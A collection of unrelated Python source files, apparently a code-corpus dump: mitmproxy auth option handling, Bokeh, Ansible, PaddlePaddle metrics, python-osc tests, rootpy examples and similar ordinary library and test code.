raise exceptions.OptionsError(
"Proxy Authentication not supported in transparent mode."
)
elif options.mode == "socks5":
raise exceptions.OptionsError(
"Proxy Authentication not supported in SOCKS mode. "
"https://github.com/mitmproxy/mitmproxy/issues/738"
)
elif options.auth_singleuser:
parts = options.auth_singleuser.split(':')
if len(parts) != 2:
raise exceptions.OptionsError(
"Invalid single-user specification. "
"Please use the format username:password"
)
password_manager = authentication.PassManSingleUser(*parts)
elif options.auth_nonanonymous:
password_manager = authentication.PassManNonAnon()
elif options.auth_htpasswd:
try:
password_manager = authentication.PassManHtpasswd(
options.auth_htpasswd
)
except ValueError as v:
raise exceptions.OptionsError(str(v))
if options.mode == "reverse":
self.authenticator = authentication.BasicWebsiteAuth(
password_manager,
self.upstream_server.address
)
else:
self.authenticator = authentication.BasicProxyAuth(
password_manager,
"mitmproxy"
)
|
py | 7df9e7a64233624f61e8eb278b9e30efa25c112b | str1 = input()
str2 = input()
goal = input()
d = {}
l = list(str1)
l2 = list(str2)
for i in range (0, len(l2),1):
if(l2[i] not in d):
d.update({l2[i]:l[i]})
for x in range (0, len(goal),1):
if(goal[x] in d):
print(d.get(goal[x]),end = "")
else:
print(".", end = "")
|
py | 7df9e88c3519949065edda03cbbd68120a7de923 | import numpy as np
from bokeh.layouts import row, widgetbox
from bokeh.models import CustomJS, Slider
from bokeh.plotting import figure, output_file, show, ColumnDataSource
x = np.linspace(0, 10, 500)
y = np.sin(x)
source = ColumnDataSource(data=dict(x=x, y=y))
plot = figure(y_range=(-10, 10), plot_width=400, plot_height=400)
plot.line('x', 'y', source=source, line_width=3, line_alpha=0.6)
callback = CustomJS(args=dict(source=source), code="""
var data = source.data;
var A = amp.value;
var k = freq.value;
var phi = phase.value;
var B = offset.value;
x = data['x']
y = data['y']
for (i = 0; i < x.length; i++) {
y[i] = B + A*Math.sin(k*x[i]+phi);
}
source.change.emit();
""")
amp_slider = Slider(start=0.1, end=10, value=1, step=.1,
title="Amplitude", callback=callback)
callback.args["amp"] = amp_slider
freq_slider = Slider(start=0.1, end=10, value=1, step=.1,
title="Frequency", callback=callback)
callback.args["freq"] = freq_slider
phase_slider = Slider(start=0, end=6.4, value=0, step=.1,
title="Phase", callback=callback)
callback.args["phase"] = phase_slider
offset_slider = Slider(start=-5, end=5, value=0, step=.1,
title="Offset", callback=callback)
callback.args["offset"] = offset_slider
layout = row(
plot,
widgetbox(amp_slider, freq_slider, phase_slider, offset_slider),
)
output_file("slider.html", title="slider.py example")
show(layout)
|
py | 7df9eb0e53e42636234e9280891099792786c1fc | # *** WARNING: this file was generated by the Kulado Kubernetes codegen tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import kulado
import kulado.runtime
import warnings
from ... import tables, version
class CronJobList(kulado.CustomResource):
"""
CronJobList is a collection of cron jobs.
"""
def __init__(self, resource_name, opts=None, items=None, metadata=None, __name__=None, __opts__=None):
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if not resource_name:
raise TypeError('Missing resource name argument (for URN creation)')
if not isinstance(resource_name, str):
raise TypeError('Expected resource name to be a string')
if opts and not isinstance(opts, kulado.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
__props__ = dict()
__props__['apiVersion'] = 'batch/v1beta1'
__props__['kind'] = 'CronJobList'
if items is None:
raise TypeError('Missing required property items')
__props__['items'] = items
__props__['metadata'] = metadata
if opts is None:
opts = kulado.ResourceOptions()
if opts.version is None:
opts.version = version.get_version()
super(CronJobList, self).__init__(
"kubernetes:batch/v1beta1:CronJobList",
resource_name,
__props__,
opts)
def translate_output_property(self, prop: str) -> str:
return tables._CASING_FORWARD_TABLE.get(prop) or prop
def translate_input_property(self, prop: str) -> str:
return tables._CASING_BACKWARD_TABLE.get(prop) or prop
|
py | 7df9eb1fdbf3645340a1ffeb8e4a699988cd83db | import pytest
from pytest_bdd import scenarios
pytestmark = [
pytest.mark.bdd,
pytest.mark.usefixtures('workbook', 'admin_user'),
]
scenarios(
'forms.feature',
'page.feature',
strict_gherkin=False,
)
|
py | 7df9ebbe6465386d6a36dd59638de04d84842b7d | #!/usr/bin/python
# Copyright 2016 Yanis Guenane <[email protected]>
# Author: Yanis Guenane <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import os
from ansible.module_utils.basic import *
try:
import yaml
except ImportError:
pyyaml_found = False
else:
pyyaml_found = True
_PROPERTIES = ['type', 'size', 'digest', 'version', 'subjectAltName',
'countryName', 'stateOrProvinceName', 'localityName',
'organizationName', 'organizationUnitName', 'commonName',
'emailAddress', 'account_key_name', 'path', 'remaining_days',
'service_name', 'service_provider']
DOCUMENTATION = '''
---
module: lecm_certificate
short_description: An Ansible module to manage lecm certificates in the configuration file
version_added: 2.2
options:
state:
required: false
choices: ['present', 'absent']
default: 'present'
description: Wheter or not the mode should be present
config:
required: false
description: Path of the lecm config file, if not using the default
name:
required: true
description: Name of the global parameter
path:
required: true
description: Path to the git repository on the local filesystem
'''
EXAMPLES = '''
- name: Create a SSL certificate
lecm_certificate:
config: /etc/lecm.conf
name: lecm.example.com
- name: Remove a SSL certificate
lecm_certificate:
config: /etc/lecm.conf
name: lecm.example.com
state: absent
'''
RETURN = '''
name:
description: Name of the SSL certificate
type: string
sample: lecm.example.com
path:
description: Path to the git project
type: string
sample: /srv/git/git_superproject
'''
class Certificate(object):
def __init__(self, module):
self.state = module.params['state']
self.config = module.params['config']
self.name = module.params['name']
self.changed = True
self.type = module.params['type']
self.size = module.params['size']
self.digest = module.params['digest']
self.version = module.params['version']
self.subjectAltName = module.params['subjectAltName']
self.countryName = module.params['countryName']
self.stateOrProvinceName = module.params['stateOrProvinceName']
self.localityName = module.params['localityName']
self.organizationName = module.params['organizationName']
self.organizationUnitName = module.params['organizationUnitName']
self.commonName = module.params['commonName']
self.emailAddress = module.params['emailAddress']
self.account_key_name = module.params['account_key_name']
self.remaining_days = module.params['remaining_days']
self.service_name = module.params['service_name']
self.service_provider = module.params['service_provider']
self.path = module.params['path']
def write(self):
l_certificate = {}
for prop in _PROPERTIES:
if getattr(self, prop):
l_certificate[prop] = getattr(self, prop)
try:
lecm_conf = yaml.load(open(self.config, 'r'))
except:
lecm_conf = {}
if lecm_conf is None:
lecm_conf = {}
certificates = {}
c_certificate = None
try:
current_certificates = copy.deepcopy(lecm_conf['certificates'])
for certificate, parameters in current_certificates.items():
if 'name' in parameters:
certificate_name = parameters['name']
else:
certificate_name = certificate
if certificate_name != self.name:
certificates[certificate_name] = parameters
else:
c_certificate = parameters
except KeyError:
pass
if c_certificate == l_certificate:
self.changed = False
else:
certificates[self.name] = l_certificate
lecm_conf['certificates'] = copy.deepcopy(certificates)
with open(self.config, 'w') as conf_file:
conf_file.write(
yaml.dump(
lecm_conf, explicit_start=True, default_flow_style=False
)
)
def remove(self):
# Not Implemented yet
pass
def dump(self):
return {'name': self.name, 'changed': self.changed}
def main():
module = AnsibleModule(
argument_spec=dict(
state=dict(default='present', choices=['present', 'absent'], type='str'),
config=dict(required=False, type='path', default='/etc/lecm.conf'),
name=dict(type='str'),
type=dict(required=False, type='str'),
size=dict(required=False, type='int'),
digest=dict(required=False, type='str'),
version=dict(required=False, type='int'),
subjectAltName=dict(required=False, type='list'),
countryName=dict(required=False, type='str'),
stateOrProvinceName=dict(required=False, type='str'),
localityName=dict(required=False, type='str'),
organizationName=dict(required=False, type='str'),
organizationUnitName=dict(required=False, type='str'),
commonName=dict(required=False, type='str'),
emailAddress=dict(required=False, type='str'),
account_key_name=dict(required=False, type='str'),
path=dict(required=False, type='path'),
remaining_days=dict(required=False, type='int'),
service_name=dict(required=False, type='str'),
service_provider=dict(required=False, default='systemd', choices=['systemd', 'sysv'], type='str'),
),
)
if not pyyaml_found:
module.fail_json(msg='the python PyYAML module is required')
path = os.path.dirname(module.params['config'])
if not os.path.isdir(path):
module.fail_json(name=path, msg='Directory %s does not exist' % path)
certificate = Certificate(module)
if certificate.state == 'present':
certificate.write()
else:
certificate.remove()
result = certificate.dump()
module.exit_json(**result)
if __name__ == '__main__':
main()
|
py | 7df9ebcc0f859e97889cf999c299e8e3a450e550 | #!/Users/Marisa/Sites/zwazo/venv/bin/python3
# Author:
# Contact: [email protected]
# Copyright: This module has been placed in the public domain.
"""
man.py
======
This module provides a simple command line interface that uses the
man page writer to output from ReStructuredText source.
"""
import locale
try:
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline, default_description
from docutils.writers import manpage
description = ("Generates plain unix manual documents. " + default_description)
publish_cmdline(writer=manpage.Writer(), description=description)
|
py | 7df9ec3605775a499ccc04182eeeb6f0c7dd6261 | import numpy as np
import paddle
import paddle.nn as nn
from paddle.metric import Metric
class RecallAtK(Metric):
"""
Recall@K is the fraction of relevant results among the retrieved Top K
results, using to evaluate the performance of Dialogue Response Selection.
Noted that this class manages the Recall@K score only for binary
classification task.
"""
def __init__(self, name='Recall@K', *args, **kwargs):
super(RecallAtK, self).__init__(*args, **kwargs)
self._name = name
self.softmax = nn.Softmax()
self.reset()
def reset(self):
"""
Resets all of the metric state.
"""
self.num_sampls = 0
self.p_at_1_in_10 = 0.0
self.p_at_2_in_10 = 0.0
self.p_at_5_in_10 = 0.0
def get_p_at_n_in_m(self, data, n, m, idx):
"""
calculate precision in recall n
"""
pos_score = data[idx][0]
curr = data[idx:idx + m]
curr = sorted(curr, key=lambda x: x[0], reverse=True)
if curr[n - 1][0] <= pos_score:
return 1
return 0
def update(self, logits, labels):
"""
Update the states based on the current mini-batch prediction results.
Args:
logits (Tensor): The predicted value is a Tensor with
shape [batch_size, 2] and type float32 or float64.
labels (Tensor): The ground truth value is a 2D Tensor,
its shape is [batch_size, 1] and type is int64.
"""
probs = self.softmax(logits)
probs = probs.numpy()
labels = labels.numpy()
assert probs.shape[0] == labels.shape[0]
data = []
for prob, label in zip(probs, labels):
data.append((prob[1], label))
assert len(data) % 10 == 0
length = int(len(data) / 10)
self.num_sampls += length
for i in range(length):
idx = i * 10
assert data[idx][1] == 1
self.p_at_1_in_10 += self.get_p_at_n_in_m(data, 1, 10, idx)
self.p_at_2_in_10 += self.get_p_at_n_in_m(data, 2, 10, idx)
self.p_at_5_in_10 += self.get_p_at_n_in_m(data, 5, 10, idx)
def accumulate(self):
"""
Calculate the final Recall@K.
Returns:
A list with scaler float: results of the calculated R1@K, R2@K, R5@K.
"""
metrics_out = [
self.p_at_1_in_10 / self.num_sampls, self.p_at_2_in_10 /
self.num_sampls, self.p_at_5_in_10 / self.num_sampls
]
return metrics_out
def name(self):
"""
Returns metric name
"""
return self._name
class JointAccuracy(Metric):
"""
The joint accuracy rate is used to evaluate the performance of multi-turn
Dialogue State Tracking. For each turn, if and only if all state in
state_list are correctly predicted, the dialog state prediction is
considered correct. And the joint accuracy rate is equal to 1, otherwise
it is equal to 0.
"""
def __init__(self, name='JointAccuracy', *args, **kwargs):
super(JointAccuracy, self).__init__(*args, **kwargs)
self._name = name
self.sigmoid = nn.Sigmoid()
self.reset()
def reset(self):
"""
Resets all of the metric state.
"""
self.num_samples = 0
self.correct_joint = 0.0
def update(self, logits, labels):
"""
Update the states based on the current mini-batch prediction results.
Args:
logits (Tensor): The predicted value is a Tensor with
shape [batch_size, num_classes] and type float32 or float64.
labels (Tensor): The ground truth value is a 2D Tensor,
its shape is [batch_size, num_classes] and type is int64.
"""
probs = self.sigmoid(logits)
probs = probs.numpy()
labels = labels.numpy()
assert probs.shape[0] == labels.shape[0]
assert probs.shape[1] == labels.shape[1]
for i in range(probs.shape[0]):
pred, refer = [], []
for j in range(probs.shape[1]):
if probs[i][j] >= 0.5:
pred.append(j)
if labels[i][j] == 1:
refer.append(j)
if not pred:
pred = [np.argmax(probs[i])]
if pred == refer:
self.correct_joint += 1
self.num_samples += probs.shape[0]
def accumulate(self):
"""
Calculate the final JointAccuracy.
Returns:
A scaler float: results of the calculated JointAccuracy.
"""
joint_acc = self.correct_joint / self.num_samples
return joint_acc
def name(self):
"""
Returns metric name
"""
return self._name
class F1Score(Metric):
"""
F1-score is the harmonic mean of precision and recall. Micro-averaging is
to create a global confusion matrix for all examples, and then calculate
the F1-score. This class is using to evaluate the performance of Dialogue
Slot Filling.
"""
def __init__(self, name='F1Score', *args, **kwargs):
super(F1Score, self).__init__(*args, **kwargs)
self._name = name
self.reset()
def reset(self):
"""
Resets all of the metric state.
"""
self.tp = {}
self.fn = {}
self.fp = {}
def update(self, logits, labels):
"""
Update the states based on the current mini-batch prediction results.
Args:
logits (Tensor): The predicted value is a Tensor with
shape [batch_size, seq_len, num_classes] and type float32 or
float64.
labels (Tensor): The ground truth value is a 2D Tensor,
its shape is [batch_size, seq_len] and type is int64.
"""
probs = paddle.argmax(logits, axis=-1)
probs = probs.numpy()
labels = labels.numpy()
assert probs.shape[0] == labels.shape[0]
assert probs.shape[1] == labels.shape[1]
for i in range(probs.shape[0]):
start, end = 1, probs.shape[1]
while end > start:
if labels[i][end - 1] != 0:
break
end -= 1
prob, label = probs[i][start:end], labels[i][start:end]
for y_pred, y in zip(prob, label):
if y_pred == y:
self.tp[y] = self.tp.get(y, 0) + 1
else:
self.fp[y_pred] = self.fp.get(y_pred, 0) + 1
self.fn[y] = self.fn.get(y, 0) + 1
def accumulate(self):
"""
Calculate the final micro F1 score.
Returns:
A scaler float: results of the calculated micro F1 score.
"""
tp_total = sum(self.tp.values())
fn_total = sum(self.fn.values())
fp_total = sum(self.fp.values())
p_total = float(tp_total) / (tp_total + fp_total)
r_total = float(tp_total) / (tp_total + fn_total)
if p_total + r_total == 0:
return 0
f1_micro = 2 * p_total * r_total / (p_total + r_total)
return f1_micro
def name(self):
"""
Returns metric name
"""
return self._name
|
py | 7df9ece02d276513adf05e134a7f57cbda0d14f8 | #!/usr/bin/env python3
# Copyright (c) 2017-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file LICENSE or http://www.opensource.org/licenses/mit-license.php.
"""An example functional test
The module-level docstring should include a high-level description of
what the test is doing. It's the first thing people see when they open
the file and should give the reader information about *what* the test
is testing and *how* it's being tested
"""
# Imports should be in PEP8 ordering (std library first, then third party
# libraries then local imports).
from collections import defaultdict
# Avoid wildcard * imports
from test_framework.blocktools import (create_block, create_coinbase)
from test_framework.messages import CInv
from test_framework.mininode import (
P2PInterface,
mininode_lock,
msg_block,
msg_getdata,
)
from test_framework.test_framework import DefiTestFramework
from test_framework.util import (
assert_equal,
connect_nodes,
wait_until,
)
# P2PInterface is a class containing callbacks to be executed when a P2P
# message is received from the node-under-test. Subclass P2PInterface and
# override the on_*() methods if you need custom behaviour.
class BaseNode(P2PInterface):
def __init__(self):
"""Initialize the P2PInterface
Used to initialize custom properties for the Node that aren't
included by default in the base class. Be aware that the P2PInterface
base class already stores a counter for each P2P message type and the
last received message of each type, which should be sufficient for the
needs of most tests.
Call super().__init__() first for standard initialization and then
initialize custom properties."""
super().__init__()
# Stores a dictionary of all blocks received
self.block_receive_map = defaultdict(int)
def on_block(self, message):
"""Override the standard on_block callback
Store the hash of a received block in the dictionary."""
message.block.calc_sha256()
self.block_receive_map[message.block.sha256] += 1
def on_inv(self, message):
"""Override the standard on_inv callback"""
pass
def custom_function():
"""Do some custom behaviour
If this function is more generally useful for other tests, consider
moving it to a module in test_framework."""
# self.log.info("running custom_function") # Oops! Can't run self.log outside the DefiTestFramework
pass
class ExampleTest(DefiTestFramework):
# Each functional test is a subclass of the DefiTestFramework class.
# Override the set_test_params(), skip_test_if_missing_module(), add_options(), setup_chain(), setup_network()
# and setup_nodes() methods to customize the test setup as required.
def set_test_params(self):
"""Override test parameters for your individual test.
This method must be overridden and num_nodes must be explicitly set."""
self.setup_clean_chain = True
self.num_nodes = 3
# Use self.extra_args to change command-line arguments for the nodes
self.extra_args = [[], ["-logips"], []]
# self.log.info("I've finished set_test_params") # Oops! Can't run self.log before run_test()
# Use skip_test_if_missing_module() to skip the test if your test requires certain modules to be present.
# This test uses generate which requires wallet to be compiled
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
# Use add_options() to add specific command-line options for your test.
# In practice this is not used very much, since the tests are mostly written
# to be run in automated environments without command-line options.
# def add_options()
# pass
# Use setup_chain() to customize the node data directories. In practice
# this is not used very much since the default behaviour is almost always
# fine
# def setup_chain():
# pass
def setup_network(self):
"""Setup the test network topology
Often you won't need to override this, since the standard network topology
(linear: node0 <-> node1 <-> node2 <-> ...) is fine for most tests.
If you do override this method, remember to start the nodes, assign
them to self.nodes, connect them and then sync."""
self.setup_nodes()
# In this test, we're not connecting node2 to node0 or node1. Calls to
# sync_all() should not include node2, since we're not expecting it to
# sync.
connect_nodes(self.nodes[0], 1)
self.sync_all(self.nodes[0:2])
# Use setup_nodes() to customize the node start behaviour (for example if
# you don't want to start all nodes at the start of the test).
# def setup_nodes():
# pass
def custom_method(self):
"""Do some custom behaviour for this test
Define it in a method here because you're going to use it repeatedly.
If you think it's useful in general, consider moving it to the base
DefiTestFramework class so other tests can use it."""
self.log.info("Running custom_method")
def run_test(self):
"""Main test logic"""
# Create P2P connections will wait for a verack to make sure the connection is fully up
self.nodes[0].add_p2p_connection(BaseNode())
# Generating a block on one of the nodes will get us out of IBD
blocks = [int(self.nodes[0].generate(nblocks=1)[0], 16)]
self.sync_all(self.nodes[0:2])
# Notice above how we called an RPC by calling a method with the same
# name on the node object. Notice also how we used a keyword argument
# to specify a named RPC argument. Neither of those are defined on the
# node object. Instead there's some __getattr__() magic going on under
# the covers to dispatch unrecognised attribute calls to the RPC
# interface.
# Logs are nice. Do plenty of them. They can be used in place of comments for
# breaking the test into sub-sections.
self.log.info("Starting test!")
self.log.info("Calling a custom function")
custom_function()
self.log.info("Calling a custom method")
self.custom_method()
self.log.info("Create some blocks")
self.tip = int(self.nodes[0].getbestblockhash(), 16)
self.block_time = self.nodes[0].getblock(self.nodes[0].getbestblockhash())['time'] + 1
height = self.nodes[0].getblockcount()
for i in range(10):
# Use the mininode and blocktools functionality to manually build a block
# Calling the generate() rpc is easier, but this allows us to exactly
# control the blocks and transactions.
block = create_block(self.tip, create_coinbase(height+1), self.block_time)
block.solve()
block_message = msg_block(block)
# Send message is used to send a P2P message to the node over our P2PInterface
self.nodes[0].p2p.send_message(block_message)
self.tip = block.sha256
blocks.append(self.tip)
self.block_time += 1
height += 1
self.log.info("Wait for node1 to reach current tip (height 11) using RPC")
self.nodes[1].waitforblockheight(11)
self.log.info("Connect node2 and node1")
connect_nodes(self.nodes[1], 2)
self.log.info("Wait for node2 to receive all the blocks from node1")
self.sync_all()
self.log.info("Add P2P connection to node2")
self.nodes[0].disconnect_p2ps()
self.nodes[2].add_p2p_connection(BaseNode())
self.log.info("Test that node2 propagates all the blocks to us")
getdata_request = msg_getdata()
for block in blocks:
getdata_request.inv.append(CInv(2, block))
self.nodes[2].p2p.send_message(getdata_request)
# wait_until() will loop until a predicate condition is met. Use it to test properties of the
# P2PInterface objects.
wait_until(lambda: sorted(blocks) == sorted(list(self.nodes[2].p2p.block_receive_map.keys())), timeout=5, lock=mininode_lock)
self.log.info("Check that each block was received only once")
# The network thread uses a global lock on data access to the P2PConnection objects when sending and receiving
# messages. The test thread should acquire the global lock before accessing any P2PConnection data to avoid locking
# and synchronization issues. Note wait_until() acquires this global lock when testing the predicate.
with mininode_lock:
for block in self.nodes[2].p2p.block_receive_map.values():
assert_equal(block, 1)
if __name__ == '__main__':
ExampleTest().main()
|
py | 7df9ed3eae0586aa8b93e01c3db046cbc0ecf51c | from frappe import _
def get_data():
return [
{
"label": _("Purchasing"),
"icon": "fa fa-star",
"items": [
{
"type": "doctype",
"name": "Material Request",
"description": _("Request for purchase."),
},
{
"type": "doctype",
"name": "Request for Quotation",
"description": _("Request for quotation."),
},
{
"type": "doctype",
"name": "Supplier Quotation",
"description": _("Quotations received from Suppliers."),
},
{
"type": "doctype",
"name": "Purchase Order",
"description": _("Purchase Orders given to Suppliers."),
},
{
"type": "doctype",
"name": "Order Tracking",
"description": _("Track orders from Suppliers."),
},
{
"type": "doctype",
"name": "Product Quality Inspection",
"label": _("Order Inspection")
},
{
"type": "doctype",
"name": "Purchase Receipt",
},
]
},
{
"label": _("Stock Management"),
"items": [
{
"type": "doctype",
"name": "Stock Entry",
},
{
"type": "doctype",
"name": "Stock Transport",
},
{
"type": "report",
"is_query_report": True,
"name": "Stock Ledger",
"doctype": "Stock Ledger Entry",
},
]
},
{
"label": _("Supplier"),
"items": [
{
"type": "doctype",
"name": "Supplier",
"description": _("Supplier database."),
},
{
"type": "doctype",
"name": "Supplier Type",
"description": _("Supplier Type master.")
},
{
"type": "doctype",
"name": "Project",
"label": _("Projects"),
"description": _("Supplier Type master.")
},
]
},
{
"label": _("Items and Pricing"),
"items": [
{
"type": "doctype",
"name": "Item",
},
{
"type": "doctype",
"name": "Product Bundle",
},
{
"type": "doctype",
"name": "Item Price",
"route": "Report/Item Price",
},
{
"type": "doctype",
"name": "Serial No",
},
{
"type": "doctype",
"name": "Past Serial No",
"description": _("Past Serial No."),
}
]
},
{
"label": _("Purchase Reports"),
"icon": "fa fa-list",
"items": [
{
"type": "report",
"is_query_report": True,
"name": "Items To Be Requested"
},
{
"type": "report",
"is_query_report": True,
"name": "Reordering Items"
},
{
"type": "report",
"is_query_report": True,
"name": "Pending Ordered Items"
},
{
"type": "report",
"is_query_report": True,
"name": "Purchase History"
},
{
"type": "report",
"is_query_report": True,
"name": "Pending Requests"
},
{
"type": "report",
"is_query_report": True,
"name": "Shipment Tracking",
"doctype": "Order Tracking",
},
{
"type": "report",
"is_query_report": True,
"name": "Costing Report",
"doctype": "Landed Cost Voucher",
},
{
"type": "report",
"is_query_report": True,
"name": "Supplier Contacts",
"label": "Supplier Contacts",
"doctype": "Address",
"route_options": {
"party_type": "Supplier"
}
},
]
},
{
"label": _("Stock Reports"),
"items": [
{
"type": "report",
"is_query_report": True,
"name": "Stock Balance",
"doctype": "Stock Ledger Entry"
},
{
"type": "report",
"is_query_report": True,
"name": "Stock Projected Qty",
"doctype": "Item",
},
{
"type": "page",
"name": "stock-balance",
"label": _("Stock Summary")
},
{
"type": "report",
"is_query_report": True,
"name": "Stock Ageing",
"doctype": "Item",
},
{
"type": "report",
"is_query_report": True,
"name": "Ordered Items To Be Delivered",
"doctype": "Delivery Note"
},
{
"type": "report",
"name": "Item Shortage Report",
"route": "Report/Bin/Item Shortage Report",
"doctype": "Purchase Receipt"
},
{
"type": "report",
"is_query_report": True,
"name": "Requested Items To Be Transferred",
"doctype": "Material Request"
},
{
"type": "report",
"is_query_report": True,
"name": "Itemwise Recommended Reorder Level",
"doctype": "Item"
},
]
},
{
"label": _("Purchase Analytics"),
"icon": "fa fa-table",
"items": [
{
"type": "page",
"name": "purchase-analytics",
"label": _("Purchase Analytics"),
"icon": "fa fa-bar-chart",
},
{
"type": "report",
"is_query_report": True,
"name": "Purchase Order Trends",
"doctype": "Purchase Order"
},
{
"type": "report",
"is_query_report": True,
"name": "Purchase Receipt Trends",
"doctype": "Purchase Receipt"
},
]
},
{
"label": _("Stock Analytics"),
"icon": "fa fa-table",
"items": [
{
"type": "page",
"name": "stock-analytics",
"label": _("Stock Analytics"),
"icon": "fa fa-bar-chart"
},
{
"type": "doctype",
"name": "Bin Setup",
"description": _("Bin Setup for warehouse")
},
]
},
]
|
py | 7df9ed8972cbad5bb2c25911600cd50a8f4ea353 | #-----------------------------------------------------------------------------
# Copyright (c) 2013-2017, PyInstaller Development Team.
#
# Distributed under the terms of the GNU General Public License with exception
# for distributing bootloader.
#
# The full license is in the file COPYING.txt, distributed with this software.
#-----------------------------------------------------------------------------
"""
Hook for http://pypi.python.org/pypi/pytest/
"""
import pytest
hiddenimports = pytest.freeze_includes()
|
py | 7df9ee8ed3a058393cbfa077dea9b57bc07615ac | import unittest
try:
import unittest.mock as mock
except ImportError:
import mock
from pythonosc import dispatcher
from pythonosc import osc_server
_SIMPLE_PARAM_INT_MSG = (
b"/SYNC\x00\x00\x00"
b",i\x00\x00"
b"\x00\x00\x00\x04")
# Regressiont test for a datagram that should NOT be stripped, ever...
_SIMPLE_PARAM_INT_9 = b'/debug\x00\x00,i\x00\x00\x00\x00\x00\t'
_SIMPLE_MSG_NO_PARAMS = b"/SYNC\x00\x00\x00"
class TestOscServer(unittest.TestCase):
def test_is_valid_request(self):
self.assertTrue(
osc_server._is_valid_request([b'#bundle\x00foobar']))
self.assertTrue(
osc_server._is_valid_request([b'/address/1/2/3,foobar']))
self.assertFalse(
osc_server._is_valid_request([b'']))
class TestUDPHandler(unittest.TestCase):
def setUp(self):
super(TestUDPHandler, self).setUp()
self.dispatcher = dispatcher.Dispatcher()
# We do not want to create real UDP connections during unit tests.
self.server = mock.Mock(spec=osc_server.BlockingOSCUDPServer)
# Need to attach property mocks to types, not objects... weird.
type(self.server).dispatcher = mock.PropertyMock(
return_value=self.dispatcher)
self.client_address = ("127.0.0.1", 8080)
def test_no_match(self):
mock_meth = mock.MagicMock()
self.dispatcher.map("/foobar", mock_meth)
osc_server._UDPHandler(
[_SIMPLE_PARAM_INT_MSG, None], self.client_address, self.server)
self.assertFalse(mock_meth.called)
def test_match_with_args(self):
mock_meth = mock.MagicMock()
self.dispatcher.map("/SYNC", mock_meth, 1, 2, 3)
osc_server._UDPHandler(
[_SIMPLE_PARAM_INT_MSG, None], self.client_address, self.server)
mock_meth.assert_called_with("/SYNC", [1, 2, 3], 4)
def test_match_int9(self):
mock_meth = mock.MagicMock()
self.dispatcher.map("/debug", mock_meth)
osc_server._UDPHandler(
[_SIMPLE_PARAM_INT_9, None], self.client_address, self.server)
self.assertTrue(mock_meth.called)
mock_meth.assert_called_with("/debug", 9)
def test_match_without_args(self):
mock_meth = mock.MagicMock()
self.dispatcher.map("/SYNC", mock_meth)
osc_server._UDPHandler(
[_SIMPLE_MSG_NO_PARAMS, None], self.client_address, self.server)
mock_meth.assert_called_with("/SYNC")
def test_match_default_handler(self):
mock_meth = mock.MagicMock()
self.dispatcher.set_default_handler(mock_meth)
osc_server._UDPHandler(
[_SIMPLE_MSG_NO_PARAMS, None], self.client_address, self.server)
mock_meth.assert_called_with("/SYNC")
if __name__ == "__main__":
unittest.main()
|
py | 7df9efdd3a504edf5c07198256f201539aa0fefd | import logging
import sys
import importlib
from pathlib import Path
from typing import Union
from powerstrip.exceptions import ModuleException
from powerstrip.utils.utils import ensure_path
# prepare logger
log = logging.getLogger(__name__)
def load_module(module_name: str, path: Union[str, Path]):
"""
load module by name from given directory
:param module_name: name of the module
:type module_name: str
:param path: complete path of the python file
:type path: Union[str, Path]
:raises ModuleException: if file does not exist or module cannot be loaded
"""
assert isinstance(module_name, str)
assert isinstance(path, (str, Path))
# ensure that directory is a Path
path = ensure_path(path)
if not path.exists():
# not a path
raise ModuleException(
f"The file '{path}' does not exist! Abort."
)
# get modules spec
log.debug(
f"getting specs for module '{module_name}' in "
f"'{path.as_posix()}'..."
)
spec = importlib.util.spec_from_file_location(
name=module_name, location=path.as_posix()
)
if spec is None:
# spec not found
raise ModuleException(
f"Could not get specs for module '{module_name}' "
f"in file '{path}'! Abort."
)
if spec.name not in sys.modules:
# get module from spec, if not yet loaded
mod = importlib.util.module_from_spec(spec)
sys.modules[spec.name] = mod
# load the module
spec.loader.exec_module(mod)
|
py | 7df9f22c66a3fb568d31e4114b914503bf86323a | from random import gauss
from rootpy.io import root_open
from rootpy.tree import Tree, TreeModel, FloatCol, IntCol
from rootpy.tree.model import TreeModelMeta
from rootpy import stl
from rootpy.vector import LorentzVector
from rootpy.tree.treetypes import FloatArrayCol
import tempfile
class Event(TreeModel):
# properties of particle "a"
a_x = FloatCol()
a_y = FloatCol()
a_z = FloatCol()
# properties of particle "b"
b_x = FloatCol()
b_y = FloatCol()
b_z = FloatCol()
# a collection of particles
col_x = stl.vector("float")
col_y = stl.vector("float")
col_z = stl.vector("float")
col_n = IntCol()
# a TLorentzVector
p = LorentzVector
i = IntCol()
# Make two files, each with a Tree called "test"
print "Creating test tree in chaintest1.root"
tmp_dir = tempfile.mkdtemp()
f = root_open(tmp_dir + "/chaintest1.root", "recreate")
branches = {
'x': FloatCol(),
'y': FloatCol(),
'z': FloatCol(),
'i': FloatCol(),
'vi': stl.vector('float'),
'vx': FloatArrayCol(4),
'vy': stl.vector('float'), }
# print branches
MyTreeModel = TreeModelMeta('MyTreeModel', (TreeModel,), branches)
tree = Tree("test", model=MyTreeModel)
# tree.create_branches(branches)
for i in xrange(10000):
tree.x = gauss(.5, 1.)
tree.y = gauss(.3, 2.)
tree.z = gauss(13., 42.)
tree.i = i
for vi in range(4):
tree.vi.push_back(vi**2)
tree.vy.push_back(vi**3)
tree.vx[vi] = vi**2
tree.fill(reset=True)
tree.write()
f.close()
# from random import randint
# tree = Tree("test", model=Event)
#
# # fill the tree
# for i in xrange(10):
# tree.a_x = gauss(.5, 1.)
# tree.a_y = gauss(.3, 2.)
# tree.a_z = gauss(13., 42.)
#
# tree.b_x = gauss(.5, 1.)
# tree.b_y = gauss(.3, 2.)
# tree.b_z = gauss(13., 42.)
#
# n = randint(1, 10)
# for j in xrange(n):
# tree.col_x.push_back(gauss(.5, 1.))
# tree.col_y.push_back(gauss(.3, 2.))
# tree.col_z.push_back(gauss(13., 42.))
# tree.col_n = n
